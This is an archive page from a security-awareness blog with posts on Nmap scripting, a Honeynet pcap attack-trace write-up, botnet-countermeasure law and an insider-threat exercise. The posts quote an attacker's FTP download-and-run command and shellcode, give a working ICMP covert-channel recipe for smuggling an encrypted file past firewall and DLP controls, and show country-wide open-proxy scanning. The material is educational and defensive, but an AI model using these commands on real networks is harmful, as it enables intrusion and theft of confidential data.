Monthly Archives: November 2012

Nmap 6 Scripting Engine with 400+ scripts

It was 1st of September of 1997, when Gordon Lyon released the article “The Art of Scanning” on the Phrack Magazine. This was the first release of the well known open source tool for network exploration and security auditing called Nmap. 15 Years later we have Nmap 6, NSE (Nmap Scripting Engine) and a bunch of books about the this powerfull tool.

Basically, I would like to introduce you to some of the Nmap Scripting Engine scripts available. The latest version bring more than 430 scripts. Let’s first install Nmap 6 and then use the NSE scripts. Using a Linux system, download the latest version of Nmap 6 from the official source code repository. To accomplish this task gcc, openssl and make should be part of your system. Subversion control versioning system is the best way to download the version and stay up2date.

$ cd /tmp/
$ mkdir nmap
$ svn co –username guest

Then you can use the configure script to set up the different variables and parameters. Then run make to compile the code and generate the binary files. When building Nmap from source you can use ./configure –help to see a complete list of directives available

$ cd nmap/
$/tmp/nmap# ./configure
$/tmp/nmap# make
$/tmp/nmap# install
$ nmap -V
Nmap version 6.20BETA1 ( )

Now that the latest version of Nmap is installed you should have around 430 scripts made with NSE under /usr/local.share/nmap/scripts. Among them you have scripts that allow you to check if a particular system is vulnerable to CVE-2012-1823, CVE-2012-2122, CVE-2012-1182 for PHP, MySQL and Samba services respectively.

Other ones are related to GeoIP and one particular interesting is called ip-geolocation-maxmind. This one gives you the ability to retrieve the Geo location of the IP you are scanning using the Maxmind database. To be able to run this script you first need to download the GeoLiteCity into /usr/local/share/nmap/nselib/data folder.

$cd /usr/local/share/nmap/nselib/data
$ wget -N -q
$ gunzip GeoLiteCity.dat.gz

$nmap –script ip-geolocation-maxmind  -p 80
Host script results:
| ip-geolocation-maxmind:
|   coordinates (lat,lon): 47.3667,8.55
|_  city: Zurich, Switzerland

Other than the GeoIP you can also retrieve the Whois Information Records without running a port scan.
$ nmap –script whois -v -Pn -sn
Host script results:
| whois: Record found at
| netrange: –
| netname: LVLT-STATIC-4-4-16
| orgname: Level 3 Communications, Inc.
| orgid: LVLT
| country: US stateprov: CO
| orgtechname: ipaddressing

You can even further extend the use of Maxmind free services and download the GeoIPCountry.csv file. Then feed it into Nmap to scan a range of IP addresses for a particular Country.
Looking at the contents of the file we can easily grep for the IP addresses for a particular country.
head GeoIPCountryWhois.csv

Next, cat the file, grep for the string you want in this case Portugal. Then use AWK with “,” as delimiter, print field 1 and 2. Pipe that into tr and delete the character ‘. Write the output into the file IP.Addresses.PT.

$cat GeoIPCountryWhois.csv | grep Portugal | awk -F “,” ‘{print $1 “-” $2}’ | tr -d ‘”‘ > IP.Addresses.PT
root@bt:/tmp/nmap/nselib/data# head IP.Addresses.PT

Now, we need to change the format of the file in order to be readable by Nmap. We need to change from “” to “2-2.80-80.0-18.0-255”.
To do that we use Awk with the split arguments. From the man page of Awk :

split(string, array, fieldsep)
This divides string into pieces separated by fieldsep, and stores the pieces in array. The first piece is stored in array[1], the second piece in array[2], and so forth. The string value of the third argument, fieldsep, is a regexp describing where to split string (much as FS can be a regexp describing where to split input records). If the fieldsep is omitted, the value of FS is used. split returns the number of elements created. The split function, then, splits strings into pieces in a manner similar to the way input lines are split into fields.

If you want to understand better this command I recommend to read carefull the previous paragraph .
$cat IP.Addresses.PT | awk -F “.” ‘{split($4,array,”-“); print $1”-“array[2]”.”$2″-“$5 “.” $3″-“$6″.”array[1]”-“$7}’  > IP.Addresses.PT.nmap

The output will be:
head IP.Addresses.PT.nmap

Now that we have the information parsed according to the Nmap expected format you can use another NSE script. This time the http-open-proxy which tries to identtify systems that will allow you to proxy connections. We can now scan per country ! The -Pn will scan the hosts even if they dont respond to icmp requests. and the -iL is to specify a list of hosts. The -p specifies the ports.

$nmap -Pn –script=http-open-proxy -iL IP.Addresses.PT.nmap -p 8080,3128

Another cool script is http-google-malware which checks if hosts are on Google’s blacklist of suspected malware and phishing servers. These lists are constantly updated and are part of Google’s Safe Browsing service. To be able to run this script you need to sign up for the Safe Browsing API. You can check manually the Safe Browsing functionality with the URL : . Replace the with the site you want to check.

After you have your API key you can run the following command :

$nmap -Pn -p80  –script http-google-malware –script-args http-google-malware.api=
80/tcp open  http
|_http-google-malware.nse: Host is known for distributing malware

For each NSE script there are additional arguments that you can run with –script-args prefix. The best source of information about them is the .nse file itself  under /usr/local.share/nmap/scripts.

Tagged , ,

Hands-on Lab – eCommerce – Part 1

An important aspect of network security is hands-on experience. Considering this I would like to share a step-by-step guide that illustrates how to create a web content management system with eCommerce shopping card software. What is the purpose? The purpose is to create a simulated real world e-commerce website in a controlled and virtual environment. Here you can find known vulnerabilities that will allow you to learn and practice security concepts.  Will also allow you to have a scenario where you can practice offensive and defensive techniques legally, safely and for educational purposes. The scenario is based on an older version of Joomla and Virtuemart running on a LAMP (Linux, Apache, MySQL, PHP) stack.

Probably the most common attack vector against Joomla based content management websites is SQL injection vulnerabilities. The National Vulnerability Database shows 755 matching records when searching for CVE’s affecting Joomla versions. ExploitDB shows 839 potential exploits for different Joomla versions and a variety of components. 487 SQL Injection related, 30 Cross Site Scripting  42 Local File Inclusion, 25 Remote File Inclusion and others. If you are familiar with Vmware this scenario can easily be extended to an Attacker system with Backtrack plus a Firewall like pfSense and/or IDS like Snort between the systems. This will allow you to further extend your skills in intrusion analysis, incident handling and penetration testing and others.

Tagged ,

Attack Trace – Honeynet challenges – Part 1

[This one is going to be really hands-on with bits and bytes. Hopefully, will allow you to reinforce and learn new skills about tshark and other tools. Optimistically, you can use this skills on your day to day job when doing Intrusion Detection and Analysis. I learned quite some stuff. If you are willing to devote some extra neurons and practice your intrusion detection and analysis skills, go for it. I runned the analysis on a backtrack linux distro.]

Honeynet is a security research organization, non-profit, dedicated to investigating attacks. This organization has been around for more than one decade. The cool stuff is that they provide Challenges to give you the opportunity to analyze these attacks, practice your skills, learn new tools and share your findings. Honeynet claim that these attacks are from real hacks which makes it even more fun.

On 18 Jan. 2010 Honeynet Project released a challenge called “pcap attack trace” with the goal to investigate a network attack. This is the one I will focus today. The packet capture can be found here. Of course the solutions and write ups are available so don’t spoil yourself too much. The question 8 for me was the most difficult and still need to learn more about the topic.

1. Which systems (i.e. IP addresses) are involved?
Powerful tshark tool to run in quite mode (-q) and print the hosts tree statistics (-z ip_hosts,tree) from the pcap file will give you the IP addresses involved.
$tshark -r attack-trace.pcap -q -z ip_hosts,tree

2. What can you find out about the attacking host (e.g., where is it located)?
Other than using whois you can also use tshark with “-R” to apply visualization filters like you do in wireshark. Plus the “-T fields” wich allows to display only the contents of the selected field in this case “smb.native_os” which exists under SMB protocol and specifies the OS. Then pipe the contents of it into “uniq”
$tshark -r attack-trace.pcap -R ‘ip.src==’ -T fields -e smb.native_os | uniq -c

3. How many TCP sessions are contained in the dump file?
Print the statistics about TCP conversations from pcap. which show 5 TCP sessions.
$tshark -r attack-trace.pcap -q -z conv,tcp -nn

4. How long did it take to perform the attack?
Tshark with “-t” will print the elapsed value in seconds. The last packet will show how long it took. Aprox. 16s
$tshark -r attack-trace.pcap -t r | tail -n 1

5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Troughout the analysis you can see that OS is Windows XP, Service is Microsoft DS and Vulnerability is MS04-11.

7. What specific vulnerability was attacked?
Analyze the pcap file with Snort using default configuration file and log the output in full mode. This will give you good details about it.
$ sudo snort -r attack-trace.pcap -c /etc/snort/snort.conf -l /tmp/ -A full
$ cat /tmp/alert

[**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
04/19-22:28:30.172468 ->
TCP TTL:113 TOS:0x0 ID:15421 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8CFFA9C Ack: 0x5BD511D9 Win: 0xF7D6 TcpLen: 20
[Xref => => =>

8. What actions does the shellcode perform? Pls list the shellcode.
This is the difficult one. I must admit it goes beyond my current skills and will need more time to learn. I needed some help and used the exisiting writeups for guidance. Basically, if you look closer to the capture, especially the stream 1, some of the packets look suspicious due the NOP slides (0x90) throughout the packets. This instructions are common in buffer overflow exploits and others. The “-x” prints the hex and ASCII, the “-V” its for verbose output.
$tshark -r attack-trace.pcap -R ‘ == 1’ –x
$tshark -r attack-trace.pcap -R ‘frame.number==29’ –xV
00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0150 90 90 eb 10 5a 4a 33 c9 66 b9 7d 01 80 34 0a 99 ….ZJ3.f.}..4..

Ok, so we want to extract just the interesting data from frame 29 which represents the shellcode.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e
(..) 90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90 (..)

Now we can try to get more information about. For example pipe the extract of “” from frame 29 into “sed” to substitute the “:” with “\x”. Then will be in a format readable by the disasembler ndisasm. The ndisasm will disassemble the binary in 32bit fashion. On the output you can see that the shellcode starts with xor instruction and trough out the list you find that the shellcode is encoded using XOR.

$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e | sed ‘s/:/\\x/g’ | ndisasm -b 32 –
00000000 3030 xor [eax],dh
00000002 5C pop esp
00000003 7830 js 0x35
00000005 305C7830 xor [eax+edi*2+0x30],bl
00000009 635C7866 arpl [eax+edi*2+0x66],bx
0000000D 345C xor al,0x5c

To decode XOR you can do similar extract but now pipe the into “xxd”. xxd with “-r -p” will allow to reverse hex into binary using postscript output.
$tshark -r attack-trace.pcap_ -R ‘frame.number==29’ -T fields -e | xxd -r -p | xxd
0000110: 9090 9090 9090 9090 9090 9090 eb10 5a4a …………..ZJ
0000120: 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb 3.f.}..4……..
0000130: ffff ff70 9598 9999 c3fd 38a9 9999 9912 …p……8…..

Finally if you pipe the contents of the binary into the disasembler you will have the shellcode instructions. But now decoded. This was how far I could go with time limitations.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e | xxd -r -p | ndisasm -b 32 –

0000011C EB10 jmp short 0x12e
0000011E 5A pop edx
0000011F 4A dec edx
00000120 33C9 xor ecx,ecx
00000122 66B97D01 mov cx,0x17d
00000126 80340A99 xor byte [edx+ecx],0x99

9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
If you use passive fingerprinting analysis into the pcap it will tell you that the victim is running Linux, however it has a microsoft vulnerability. We can assume that its a honeypot.

$ sudo p0f -s attack-trace.pcap  ‘src’
p0f – passive os fingerprinting utility, version 2.0.8
(C) M. Zalewski <>, W. Stearns <>
p0f: listening (SYN) on ‘attack-trace.pcap_’, 262 sigs (14 generic, cksum 0F1F5CA2), rule: ‘src’. – Linux 2.6 (newer, 3) (up: 11265 hrs)
-> (distance 0, link: ethernet/modem)
[+] End of input file.

10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge).
There is extra file downloaded using FTP after the compromise of the system. You can see on stream 2 and 3 details about it.

$tshark -r attack-trace.pcap -R ‘’ -T fields -e data.text

echo open 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe\x0d\x0a

$ tshark -r attack-trace.pcap -R ‘’ -T fields -e data.text

220 NzmxFtpd 0wns j0\x0a
USER 1\x0d\x0a
331 Password required\x0a
PASS 1\x0d\x0a
230 User logged in.\x0a
215 NzmxFtpd\x0a
TYPE I\x0d\x0a
200 Type set to I.\x0a
PORT 192,150,11,111,4,56\x0d\x0a
200 PORT command successful.\x0a
RETR ssms.exe\x0d\x0a
150 Opening BINARY mode data connection\x0a
226 Transfer complete.\x0a
221 Goodbye happy r00ting.\x0a

Other than that, on stream4 there is a Windows executable that is easily identified by its file signature (magic number) wich contains “MZ” string. There are a variety of tools to extract and do carving of pcap files. I used “foremost”  to extract it.

$ foremost -i attack-trace.pcap
Processing: attack-trace.pcap

$ ls output/exe/
$ file output/exe/00000021.exe
output/exe/00000021.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Finally you can download Clamav (Sourcefile opensource AV) into your system and scan the executable file.

$ sudo apt-get install clamav clamac-freshclam
$clamscan output/exe/00000021.exe
00000021.exe: Trojan.SdBot-9861 FOUND.

Tagged ,

Countermeasures against Botnets – Legal aspects

The NATO Cooperative Cyber Defense Centre of Excellence based in Tallinn, Estonia just released a study about the legal implications of passive and active countermeasures against botnets. This investigation is made in collaboration with European Network and Information Security Agency (ENISA). It covers the legal aspects of fighting against botnets taking into account the German and Estonian law.  The study was created by two legal experts, one attorney, two scientists and a post-graduate civil service trainee. It’s very well written and it uses an interdisciplinary language which makes it accessible to people who aren’t specialist in information technology or legal.

It covers a variety of interesting topics such as assuming a system is compromised by a botnet. One of the steps, as part of the incident handling process, is that you might capture and inspect the traffic in order to detect and analyze the botnet traffic. However, from a legal perspective the study presents a variety of legal concerns regarding this. Some of them are personal data protection, unauthorized surveillance and confidentiality of communications. It means such monitoring might be perceived as breach of criminal law.  Even if some of the laws were not written in light of cyber space it still can apply.

Another topic with very unique characteristics and legal concerns is running a honeypot to collect, store and process data to learn about botnets. What are the legal concerns about sharing the data gained from running the honeypot? Or how it can be challenging for a private researcher to prove that the data he is collecting is for scientific interests.  These and other legal concerns are discussed in the study.

How about the takeover of botnets? Which assumes you successful infiltrated the CnC server. If the Botnet is taken over with the intent to eliminate and prevent crime and not prepare one, it still has implications under criminal law. Given the uncertainty of jurisdictional traits on how to handle such situations there is the risk of someone making him susceptible to prosecution. Other topics include: Takedown of Command and Control Servers, Automated Immunization or Disinfection, Botnet Mitigation Techniques under Exceptional Circumstances, Duty to Act against Botnet Attacks and Liability of Owners of Infected Hosts.

Apart of that, through out the study there are excellent reference’s that provide supporting and corroborating evidence of their assertions. Definitely a must read for security professionals involved in incident handling and others.

Tagged , ,

Insider Threat – Dee Cypher

On my previous post I wrote about gamification and how it can be used to learn security skills. Let’s further illustrate this with a challenge that represents the risks of insider threats. Exfiltrating data using covert channels. A typical case of espionage:

Justin Case, a high-priced lawyer and an operative for V.I.L.E. found that ACME is working on a new high-profile deal. Justin Case wants to get the hands on that information to sell it to the competitors. He just contacted another operational from V.I.L.E. Dee Cypher who has insider access to ACME. His mission is to smuggle confidential information bypassing the high end security controls in place like Firewalls and Data Lost Prevention. During a secret venue they shared some information: The ACME is running the latest version of Checkpoint Firewall with rigid rules however it allows ping requests to me made with a maximum ping size protection of 1400 bytes. Also to bypass DLP inspection they agreed that the information should be sent encrypted using symmetric encryption AES 256 bits with a shared secret that they agreed upon.

How can Dee Crypt and Justin Case accomplish this mission?

DeeCypher$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
DeeCypher$ openssl enc -e -aes-256-cbc -in SecretPlans.pdf -out SecretPlans.enc
DeeCypher$ ls –lrta
-rw-r–r– 1 DeeCypher DeeCypher 30800 2012-11-17 15:49 SecretPlans.enc
DeeCypher$ echo ‘scale=2;30800/1400’ | bc –q
DeeCypher$ sudo hping3 -E SecretPlans.enc -1 -u -d 1400 -c 22

JustinCase$ sudo tcpdump -nni eth0 -s0 proto 1 -w receiving.pcap
JustinCase$ tshark -r receiving.pcap -R ‘icmp.type==8’ -w data.pcap
JustinCase$ tshark -r data.pcap -T fields -e data | xxd -r -p > SecretPlans.enc
JustinCase$ openssl enc -d -aes-256-cbc -in SecretPlans.enc -out SecretPlans.pdf
JustinCase$ md5sum SecretPlans.pdf
0c376606bbbca8f089151df189edfd8b SecretPlans.pdf
JustinCase$ acroread SecretPlans.pdf

Lets describe the commands of Dee Cypher. First, the md5 of SecretPlans.pdf was produced, which can then be used to verify the file integrity. Next, the file SecretPlans.pdf was encrypted using AES-256-CBC algorithm resulting into SecretPlans.enc. Then, SecretPlans.enc was checked and it contains 30800 bytes. Now he wanted to know how many ICMP packets he will need to send the contents of the file using a payload of 1400 bytes. To do this he used the precision calculator bc in quiet mode. Divided the total amount of the file size by the size of the payload. The result was formatted to show two digits after the decimal point, it’s 22. It means, he will need to send 22 packets to send the whole contents of the file. To forge the ICMP packets hping3 was used. It’s specified the filename that will fill packet data, the traffic type using icmp mode with a data size of 1400 and a total of 22 packets.

On the other end, JustinCase executed tcpdump to capture ICMP traffic with no limit on the captured packet size. He extracted the traffic, using tshark, that matched wireshark filter ICMP Echo Request (type 8) and wrote it into data.pcap. Then, extracted the data portion of the ICMP payload. The output of this command was piped into xxd to convert the data into binary using plain hexdump style. The file was decrypted using the same algorithm and finally integrity was checked and the file was opened with acrobat reader.

Note: On this example a Checkpoint R75 with IPS and DLP blade enable was used. The IPS had configured a Max Ping Size of 1400 bytes.  By default the IPS does not have the Max Ping Size protection enable and the default value is 2500 bytes. Further, the ICMP traffic is not covered by DLP inspection which means the data could be sent in clear text instead of encrypted.

After having fun and eventually engage people to challenge this with other possibilities and tools let’s think about it. This example demonstrates that insider threat should be a serious concern by today organizations. In this case Intellectual property or confidential information could be stolen. Understanding how susceptible you are to insider threat is a valuable step in order to develop controls to detect, remediate and mitigate. Access to information outside of need to know, unauthorized encryption of information, unauthorized information transfer are examples of technical actions and indicators that could be used in this case as observables for a possible detection.

In 2006, the CERT coordination center which is located at Carnegie Mellon University released a technical report “Comparing Insider IT Sabotage and Espionage: A model-based analysis‘. This study considered not only the technical factors that contribute to Espionage and Sabotage cases but also the psychological, organizational and contextual factors. It’s definitely a good read for security professionals and leaders with responsibility on the organization security posture. Other than that the CERT Insider Threat Centers provides comprehensive and detailed information about this topic.

Tagged , , ,
gb_master's /dev/null

... and I said, "Hello, Satan. I believe it's time to go."

Source Code Auditing, Reversing, Web Security

Finding Hidden codes in the software

BruteForce Lab's Blog

security, programming, devops, visualization, the cloud

Count Upon Security

Increase security awareness. Promote, reinforce and learn security skills.

Naked Security

Computer Security News, Advice and Research

Didier Stevens

(blog \'DidierStevens)


Adventures in double-clicking malware / by Anuj Soni

Rational Survivability

Hoff's Ramblings about Information Survivability, Information Centricity, Risk Management and Disruptive Innovation.

SANS Internet Storm Center, InfoCON: green

Increase security awareness. Promote, reinforce and learn security skills.


Increase security awareness. Promote, reinforce and learn security skills.

Schneier on Security

Increase security awareness. Promote, reinforce and learn security skills. Blog

Increase security awareness. Promote, reinforce and learn security skills.

Lenny Zeltser

Increase security awareness. Promote, reinforce and learn security skills.

Krebs on Security

In-depth security news and investigation